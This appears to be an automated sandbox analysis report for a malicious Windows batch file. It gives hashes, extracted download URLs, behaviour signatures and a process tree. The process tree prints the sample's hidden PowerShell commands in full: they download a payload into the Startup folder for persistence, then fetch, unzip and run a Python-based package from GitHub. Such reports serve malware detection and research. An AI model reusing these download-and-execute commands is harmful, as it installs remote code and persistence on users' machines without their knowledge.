Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
05/06/2024, 14:32
Static task
static1
Behavioral task
behavioral1
Sample
462fdb86855a912ee6c9a076c1a6f77973daea97df652cf47310976c7e58b340.bat
Resource
win7-20231129-en
General
-
Target
462fdb86855a912ee6c9a076c1a6f77973daea97df652cf47310976c7e58b340.bat
-
Size
28KB
-
MD5
4bbf7218eb67763078c0a6c9a4d27ee2
-
SHA1
e1a571c79b74cb842071b90e1d6c8407a25e5459
-
SHA256
462fdb86855a912ee6c9a076c1a6f77973daea97df652cf47310976c7e58b340
-
SHA512
cb1d1c0c279d68ce02122c73d195ec1503cbe347bfb2bbd64cfa5e7108617b21eac96a848ba6ee4109d350458331b3a2f1a2a65c7463db7494ba82ae4761045b
-
SSDEEP
192:ovUjBvkHo0JHs1VtLX8gY7SoZfTU+yFe7dXTT8dPwQ4gH:ocjJkHohTLX8f7SoZQ+yFe7Jf+PZrH
Malware Config
Extracted
https://github.com/sdvsdv23rbfdb3/kjkj/raw/main/1
Extracted
https://github.com/bao3125/Post/raw/main/Document.zip
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 5 2576 powershell.exe 6 2576 powershell.exe 8 2492 powershell.exe 9 2492 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 2576 powershell.exe 2492 powershell.exe 2544 powershell.exe 2068 powershell.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecure.bat powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2576 powershell.exe 2492 powershell.exe 2544 powershell.exe 2068 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2576 powershell.exe Token: SeDebugPrivilege 2492 powershell.exe Token: SeDebugPrivilege 2544 powershell.exe Token: SeDebugPrivilege 2068 powershell.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 2956 wrote to memory of 2412 2956 cmd.exe 29 PID 2956 wrote to memory of 2412 2956 cmd.exe 29 PID 2956 wrote to memory of 2412 2956 cmd.exe 29 PID 2956 wrote to memory of 2240 2956 cmd.exe 30 PID 2956 wrote to memory of 2240 2956 cmd.exe 30 PID 2956 wrote to memory of 2240 2956 cmd.exe 30 PID 2956 wrote to memory of 3036 2956 cmd.exe 31 PID 2956 wrote to memory of 3036 2956 cmd.exe 31 PID 2956 wrote to memory of 3036 2956 cmd.exe 31 PID 2956 wrote to memory of 3016 2956 cmd.exe 32 PID 2956 wrote to memory of 3016 2956 cmd.exe 32 PID 2956 wrote to memory of 3016 2956 cmd.exe 32 PID 2956 wrote to memory of 2556 2956 cmd.exe 33 PID 2956 wrote to memory of 2556 2956 cmd.exe 33 PID 2956 wrote to memory of 2556 2956 cmd.exe 33 PID 2956 wrote to memory of 2344 2956 cmd.exe 34 PID 2956 wrote to memory of 2344 2956 cmd.exe 34 PID 2956 wrote to memory of 2344 2956 cmd.exe 34 PID 2956 wrote to memory of 2152 2956 cmd.exe 35 PID 2956 wrote to memory of 2152 2956 cmd.exe 35 PID 2956 wrote to memory of 2152 2956 cmd.exe 35 PID 2956 wrote to memory of 1420 2956 cmd.exe 36 PID 2956 wrote to memory of 1420 2956 cmd.exe 36 PID 2956 wrote to memory of 1420 2956 cmd.exe 36 PID 2956 wrote to memory of 2580 2956 cmd.exe 37 PID 2956 wrote to memory of 2580 2956 cmd.exe 37 PID 2956 wrote to memory of 2580 2956 cmd.exe 37 PID 2956 wrote to memory of 2576 2956 cmd.exe 38 PID 2956 wrote to memory of 2576 2956 cmd.exe 38 PID 2956 wrote to memory of 2576 2956 cmd.exe 38 PID 2956 wrote to memory of 2492 2956 cmd.exe 39 PID 2956 wrote to memory of 2492 2956 cmd.exe 39 PID 2956 wrote to memory of 2492 2956 cmd.exe 39 PID 2956 wrote to memory of 2544 2956 cmd.exe 40 PID 2956 wrote to memory of 2544 2956 cmd.exe 40 PID 2956 wrote to memory of 2544 2956 cmd.exe 40 PID 2956 wrote to memory of 2068 2956 cmd.exe 41 PID 2956 wrote to memory of 2068 2956 cmd.exe 41 PID 2956 wrote to memory of 2068 2956 cmd.exe 41
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\462fdb86855a912ee6c9a076c1a6f77973daea97df652cf47310976c7e58b340.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\Windows\system32\chcp.comchcp.com 4372⤵PID:2412
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp2⤵PID:2240
-
-
C:\Windows\system32\findstr.exefindstr /L /I set C:\Users\Admin\AppData\Local\Temp\462fdb86855a912ee6c9a076c1a6f77973daea97df652cf47310976c7e58b340.bat2⤵PID:3036
-
-
C:\Windows\system32\findstr.exefindstr /L /I goto C:\Users\Admin\AppData\Local\Temp\462fdb86855a912ee6c9a076c1a6f77973daea97df652cf47310976c7e58b340.bat2⤵PID:3016
-
-
C:\Windows\system32\findstr.exefindstr /L /I echo C:\Users\Admin\AppData\Local\Temp\462fdb86855a912ee6c9a076c1a6f77973daea97df652cf47310976c7e58b340.bat2⤵PID:2556
-
-
C:\Windows\system32\findstr.exefindstr /L /I pause C:\Users\Admin\AppData\Local\Temp\462fdb86855a912ee6c9a076c1a6f77973daea97df652cf47310976c7e58b340.bat2⤵PID:2344
-
-
C:\Windows\system32\find.exefiNd2⤵PID:2152
-
-
C:\Windows\system32\find.exefInd2⤵PID:1420
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp2⤵PID:2580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/sdvsdv23rbfdb3/kjkj/raw/main/1', 'C:\Users\Admin\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat')"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/bao3125/Post/raw/main/Document.zip', 'C:\Users\Public\Document.zip')"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2492
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\python.exe C:\Users\Public\Document\Lib\sim.py"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2068
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
14B
MD5ce585c6ba32ac17652d2345118536f9c
SHA1be0e41b3690c42e4c0cdb53d53fc544fb46b758d
SHA256589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3
SHA512d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD519ffe2ac25a39d6099a6696356731921
SHA148e5afd31cc13e1b252f34beea6bb66a06f6eb5a
SHA25699b7ad6069d7e36ce630f9b949898c642f97b6b4ea36815c0c9fe0d620cea60f
SHA512c65908e5d5a5590402a6657275781e70cdbc8ba17209c1bb8a46899a10c1d3d7418b55aff570cd5e554d40044f06aac0ede6f5d8b242915c60eb82ebe2fef61a